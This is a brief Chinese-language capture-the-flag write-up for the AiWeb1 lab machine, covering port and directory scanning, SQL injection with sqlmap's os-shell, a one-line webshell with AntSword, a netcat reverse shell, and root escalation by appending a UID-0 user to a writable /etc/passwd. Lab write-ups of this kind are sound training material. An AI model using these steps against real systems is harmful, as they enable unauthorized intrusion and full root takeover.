AiWeb1靶机入侵教程

[]为所使用的工具,图片顺序正确,dirb和nmap和sqlmap比较简单就没图片了

[nmap]只开放了80端口

[dirb]然后目录爆破

然后有一个pipinfo和输入框sql注入(不过这个里面什么都没有)

[sqlmap]不过sqlmap –os-shell可以进入shell(完整目录通过pipinfo可以知道)

[蚁剑,nc]然后写了个一句话木马连蚁剑，然后蚁剑里面写nc，反弹到kali，然后发现/etc/passwd可以读写，用openssl passwd -1 -salt huo 123456创建密码，然后echo ‘huo:密码:0:0:/root:/bin/bash’ >> /etc/passwd，由于没有tty，所以需要python -c ‘import pty;pty.spawn(“/bin/bash”)’，成功后su huo，输入密码123456，发现已经变成了root@aiweb，就完成了